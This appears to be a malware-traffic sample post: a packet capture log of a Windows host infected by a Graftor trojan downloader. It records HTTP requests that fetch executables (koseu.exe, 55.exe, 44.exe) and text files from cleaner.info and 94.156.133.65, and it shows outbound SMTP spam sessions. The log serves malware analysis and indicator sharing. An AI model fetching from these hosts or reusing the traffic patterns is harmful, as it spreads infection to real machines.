Text Example

Koseu.exe sathishkumar_n10@rediffmail.com Malware David57@0114.com Mikey Graftor Trojan Downloader PCAP Download Sample

https://www.virustotal.com/fr/file/b43fffd7896832a0876ce7c950a57450c37c733fd3b8080bbbbb84e798640338/analysis/1556983689/

2019-05-21 21:35:47.617598 IP 10.1.10.162.53171 > 50.87.249.186.80: Flags [P.], seq 1:424, ack 1, win 16425, length 423: HTTP: GET /koseu.exe HTTP/1.1
E…`M@…X’
.
.2W…..P.=.Z..!.P.@)….GET /koseu.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cleaner.info
Connection: Keep-Alive

2019-05-21 21:37:10.978863 IP 94.156.133.65.80 > 10.1.10.162.53680: Flags [.], seq 1461:2921, ack 145, win 237, length 1460: HTTP

E ..K_@.0…^..A

………c…….P.@.VS..RCPT TO: sathishkumar_n10@rediffmail.com

2019-05-21 21:37:17.465016 IP 10.1.10.162.53775 > 98.137.159.25.25: Flags [P.], seq 17:48, ack 77, win 16406, length 31: SMTP: MAIL FROM: David57@0114.com
E..Gvq@…m.
.
.b………64.F”.P.@.s…MAIL FROM: David57@0114.com

2019-05-21 21:35:47.698035 IP 50.87.249.186.80 > 10.1.10.162.53171: Flags [.], ack 424, win 237, length 0

E .(ni@.1…2W..

Content-Encoding: gzip

f56
………..Z{o….;..wTLl.zX..~...t..0wg..X,....h[.,..r.o....CR/;.v.{]4......yQ...~...?..g.b._.....<.O,.8..,..<..R.....KQL.O..v.iV.'|)&.]$.Y....... ..QX,&.......6....x....b...8JnY......,......M.EQdC../....s.~.x...(.Oyp..&..OD.F.,.. .q..n.........X\....%i.f.* .........^9.4T..N.H'.e....Mc..fW..4.ce.I7H…5.{a.t…….B. / .b.A.<..(.E.&^..k..)bbb.r.a…JG.g!.?……&..v.L.K.[~uk.E.z5.{{c..QV.N.q_x7…QR…:J.t..s..ez.]….%…k……P…^{……-.by..i..=….t. …….e[..k.,……y\X.0…F.’B…@X……S..:..M……%A. ……Z..d.p……o.D>9v..~.zz..|.f.$ ..r{j….7.i..p.s.L…bsgy…A.LC1.].”. …………..|Q……?BN..%C.t.E$m..x.7″….-..x.?}……..V..5..O..d”..E.k…h.=….j.{z..?…….da?B.p:8=E.Y.”…:…. .g.rx(.,>…f1.[C..;….”G’….
….g….5s>….{…………s.=…|.i……~…?>.7WX….#.=……5… .q..}0.......5Ub">.N....7.....TJ..P.4f .S..Z..R..d.....z..r(].x....<.p;pC..|....n..{..Ea...7.........;.....l]$.."..n.{";...;.o..] ...iY8/.Z....x_..6.u....fi.....s..j..."...``.Q........aK....].z......V..';..G....E2/.....^...........w..[... 2019-05-21 21:35:47.961939 IP 10.1.10.162.53171 > 50.87.249.186.80: Flags [.], ack 4325, win 16425, length 0 E..(P@…Y.
.
.2W…..P.=….2.P.@)......... 2019-05-21 21:35:48.006558 IP 10.1.10.162.53171 > 50.87.249.186.80: Flags [P.], seq 424:829, ack 4325, win 16425, length 405: HTTP: GET /wp-content/themes/sydney/css/bootstrap/bootstrap.min.css?ver=1 HTTP/1.1 E...Q@…X5
.
.2W…..P.=….2.P.@)….GET /wp-content/themes/sydney/css/bootstrap/bootstrap.min.css?ver=1 HTTP/1.1
Accept: /
Referer: http://cleaner.info/koseu.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cleaner.info
Connection: Keep-Alive

2019-05-21 21:35:48.306312 IP 10.1.10.162.53175 > 50.87.249.186.80: Flags [P.], seq 396:802, ack 3370, win 16425, length 406: HTTP: GET /wp-content/themes/sydney/js/skip-link-focus-fix.js?ver=20130115 HTTP/1.1
E…`x@…X
.
.2W…..P.<k0..i.P.@)#/..GET /wp-content/themes/sydney/js/skip-link-focus-fix.js?ver=20130115 HTTP/1.1
Accept: /
Referer: http://cleaner.info/koseu.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cleaner.info
Connection: Keep-Alive

2019-05-21 21:35:48.312292 IP 50.87.249.186.80 > 10.1.10.162.53171: Flags [.], seq 9775:11235, ack 1221, win 254, length 1460: HTTP: HTTP/1.1 200 OK

X-Proxy-Cache: MISS
Content-Encoding: gzip

159
………….n.0….Sx….A..i.8 …6..[.A…2………….?..#..mN.Y..o”v.. .f…….J…..*…-]..M…2…G)a.’.!.’.OG..>.s[..n.uI.u.3..7.6....$……j..[..)…
…..B..1^_..E..6….b…..B…x…..Z…W.V8.],@t+…..R]…:.ME.
u…[I.r.4z…..o……|~.m`9…mMmV.9…I{….(.@…E.z..8..N..l…7=..byq……I…u..l^…8tH.i….7……
0

2019-05-21 21:35:48.547694 IP 10.1.10.162.53171 > 50.87.249.186.80: Flags [P.], seq 1221:1619, ack 15066, win 16425, length 398: HTTP: GET /wp-content/themes/sydney/fonts/fontawesome-webfont.eot? HTTP/1.1
E…`.@…X.
.
.2W…..P.=…..P.@)M…GET /wp-content/themes/sydney/fonts/fontawesome-webfont.eot? HTTP/1.1
Accept: /
Referer: http://cleaner.info/koseu.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cleaner.info
Connection: Keep-Alive

2019-05-21 21:36:01.486633 IP 10.1.10.162.53184 > 94.156.133.65.80: Flags [P.], seq 1:422, ack 1, win 16425, length 421: HTTP: GET /55.exe HTTP/1.1
E…a*@…..
.
.^..A…P.8<…=.P.@)….GET /55.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 94.156.133.65
Connection: Keep-Alive

2019-05-21 21:36:19.539006 IP 10.1.10.162.53186 > 94.156.133.65.80: Flags [P.], seq 1:142, ack 1, win 16425, length 141: HTTP: GET /a/p.txt HTTP/1.1
E…a.@…..
.
.^..A…P……C.P.@)v…GET /a/p.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 94.156.133.65

2019-05-21 21:36:28.136168 IP 10.1.10.162.53188 > 94.156.133.65.80: Flags [P.], seq 142:285, ack 250, win 16362, length 143: HTTP: GET /a/369.txt HTTP/1.1
E…a.@…..
.
.^..A…P5.X…^.P.?…..GET /a/369.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 94.156.133.65

2019-05-21 21:36:28.361090 IP 94.156.133.65.80 > 10.1.10.162.53188: Flags [.], seq 250:1710, ack 285, win 245, length 1460: HTTP: HTTP/1.1 200 OK
E ….@./..l^..A
.
..P….^.5.X.P…I…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)

Date: Wed, 22 May 2019 01:36:28 GMT

.
.j
.K…..7w..C..P.?.R…
.
.
2019-05-21 21:36:37.871707 IP 10.1.10.162.53238 > 98.137.159.25.25: Flags [P.], seq 1:17, ack 45, win 16414, length 16: SMTP: HELO [0.0.0.0]
E..8d.@…..
.
.b…….$.A. {..P.@..u..HELO [0.0.0.0]

2019-05-21 21:36:37.874589 IP 10.1.10.162.53184 > 94.156.133.65.80: Flags [P.], seq 422:843, ack 427276, win 65096, length 421: HTTP: GET /44.exe HTTP/1.1
E…d.@…..
.
.^..A…P.8>….%P..H{…GET /44.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 94.156.133.65
Connection: Keep-Alive

2019-05-21 21:36:37.876216 IP 10.1.10.162.53243 > 98.137.159.25.25: Flags [S], seq 2705971778, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0

E..4d.@…..

.
..5…”.T………….6068.com…..

2019-05-21 21:37:10.757275 IP 10.1.10.162.53680 > 94.156.133.65.80: Flags [P.], seq 1:145, ack 1, win 16425, length 144: HTTP: GET /porn/p.txt HTTP/1.1
E…sg@….X
.
.^..A…P. .M…eP.@).n..GET /porn/p.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 94.156.133.65

Leave a Reply